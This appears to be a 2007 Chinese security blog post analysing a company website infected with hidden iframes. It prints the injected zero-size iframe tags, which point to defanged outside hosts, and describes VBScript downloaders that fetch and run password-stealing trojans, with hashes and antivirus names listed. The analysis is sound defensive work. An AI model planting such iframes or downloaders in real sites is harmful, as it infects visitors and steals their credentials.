某市长运运输集团有限公司网站被挂马Trojan.PSW.JHOnline.fcd等
来源:互联网 发布:形体训练 知乎 编辑:程序博客网 时间:2024/04/19 09:58
endurer 原创
2007-02-12 第1版
该网站首页首部被加入代码:
/--------
<iframe src=hxxp://g***m**06.z**kd**520.cn/k**k*k/wm.htm width=0 height=0></iframe>
<iframe src=hxxp://www.y*x***gm***7*8.com/mh/mh.htm width=0 height=0></iframe>
<iframe src=hxxp://www.y*x***gm***7*8.com/mh/wow.htm width=0 height=0></iframe>
<iframe src=hxxp://www.2***s*s**s*s.com/qq/pop.htm width=0 height=0></iframe>
--------/
中部被加入代码:
/--------
<iframe src=hxxp://ll78.com/qq/2.asp width=0 height=0></iframe>
<iframe src="hxxp://ll78.com/index1.asp" width=0 height=0></iframe>
<iframe src="hxxp://ll78.com/xiao.htm" width=0 height=0></iframe>
--------/
1、hxxp://g***m**06.z**kd**520.cn/kkk/wm.htm
包含有使用escape()加密的VBScript脚本程序,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件1.exe,保存为 %temp%/asde.exe,利用Shell.Application 对象 Q 的 ShellExecute 方法 来运行 。
/--------
文件说明符 : d:/test/1.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-2-11 22:45:52
修改时间 : 2007-2-11 22:45:54
访问时间 : 2007-2-11 0:0:0
大小 : 59121 字节 57.753 KB
MD5 : 42488f09828498af6c511bc1df294791
--------/
Kaspersky报为:Backdoor.Win32.Agent.aex
2、hxxp://www.y*x***gm***7*8.com/mh/mh.htm
包含VBScript脚本程序,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件mh.exe,保存为 %temp%/IE601.com,利用Shell.Application 对象 Q 的 ShellExecute 方法 来运行。
/--------
文件说明符 : d:/test/mh.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-2-11 22:50:30
修改时间 : 2007-2-11 22:50:32
访问时间 : 2007-2-11 0:0:0
大小 : 20480 字节 20.0 KB
MD5 : 249bbfd18001ff78d14e0b8d7bfb4596
--------/
采用 UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo 加壳
Kaspersky报为:Trojan-PSW.Win32.OnLineGames.fb
Scanned file: mh.exe - Infected
mh.exe - infected by Trojan-PSW.Win32.OnLineGames.fbStatistics:
Known viruses: 266800 Updated: 11-02-2007 File size (Kb): 20 Virus bodies: 1 Files: 1 Warnings: 0 Archives: 0 Suspicious: 0瑞星报为:Trojan.PSW.JHOnline.fcd
3、hxxp://www.y*x***gm***7*8.com/mh/wow.htm
包含VBScript脚本程序,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件wow.exe,保存为 %temp%/IE603.com,利用Shell.Application 对象 Q 的 ShellExecute 方法 来运行。
/--------
文件说明符 : d:/test/wow.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-2-11 22:50:47
修改时间 : 2007-2-11 22:50:48
访问时间 : 2007-2-11 0:0:0
大小 : 45056 字节 44.0 KB
MD5 : f6d6c2e4bb78416e9e74638be1fc4a8d
--------/
采用BERO加壳
Kaspersky报为:Trojan.Win32.Agent.abf
Dr.Web报为:Trojan.Havedo
hxxp://www.2***s*s**s*s.com/qq/pop.htm
hxxp://l*l***7*8.com/qq/2.asp
hxxp://l*l***7*8.com/index1.asp
hxxp://l*l***7*8.com/xiao.htm
均无法找到该页
- 某市长运运输集团有限公司网站被挂马Trojan.PSW.JHOnline.fcd等
- 遭遇Trojan.PSW.JHOnline,Trojan.Spy.Agent等之后
- 遭遇RootKit.Vanti.kn、Trojan.PSW.JHOnline.eqo、Trojan.PSW.LMir.ktn等
- 某旅游信息网站被挂马Trojan-PSW.Win32.QQRob.lp等
- 遭遇Trojan.PSW.Win32.GameOnline,Trojan.PSW.Win32.QQPass等
- 遭遇Trojan.PSW.ZhengTu,Trojan.PSW.OnlineGames,Trojan.PSW.ZhuXian.b等
- 清除Trojan.PSW.WoWar.qq等木马
- 下载Trojan-PSW.Win32.QQPass.ra等恶意程序的政府网站
- 刘三姐故乡网站加挂Trojan-PSW.Win32.Delf.qc,Worm.Win32.Agent.uu等
- 遭遇Trojan.PSW.Lmir.lkh、Trojan.PSW.WoWar.qd、Trojan.Agent.kh0等
- 遭遇Trojan.PSW.OnlineGames、Trojan.HiJack.a、Trojan.PSW.ZhuXian.b等
- 遭遇Trojan-PSW.Win32.WOW,Trojan.PSW.Win32.OnlineGames,Trojan.MnLess.kks等1
- 遭遇Trojan-PSW.Win32.WOW,Trojan.PSW.Win32.OnlineGames,Trojan.MnLess.kks等2
- 遭遇Trojan-Spy.Win32.Delf.uv,Trojan.PSW.Win32.XYOnline,Trojan.PSW.Win32.ZhengTu等1
- 遭遇Trojan-Spy.Win32.Delf.uv,Trojan.PSW.Win32.XYOnline,Trojan.PSW.Win32.ZhengTu等2
- 某市发改委网站被挂马 xzz.exe/Trojan-Downloader.Win32.Delf.aof
- 遭遇Trojan-PSW.Win32.WOW.ms、Trojan-PSW.Win32.Lmir.bgb等木马
- 又一位网友中了Viking,Trojan.PSW.OnLineGames.abo,Trojan.PSW.SBoy.b等
- 严蔚敏数据结构学习笔记四.串
- 严蔚敏数据结构学习笔记五.数组和广义表
- 严蔚敏数据结构学习笔记六.树和二叉树
- J2EE安装
- 循环单链表的类实现
- 某市长运运输集团有限公司网站被挂马Trojan.PSW.JHOnline.fcd等
- JAVA编程思想读书笔记四(控制程序流程)
- 史上破坏力最大的10种计算机病毒排名
- 初学socket(Server.java)
- 初学socket(ServerGui.java)
- 初学socket(ServerThread.java)
- 熊猫烧香电脑病毒案告破 抓获8名疑犯
- 61条面向对象设计的经验原则
- 原来是通的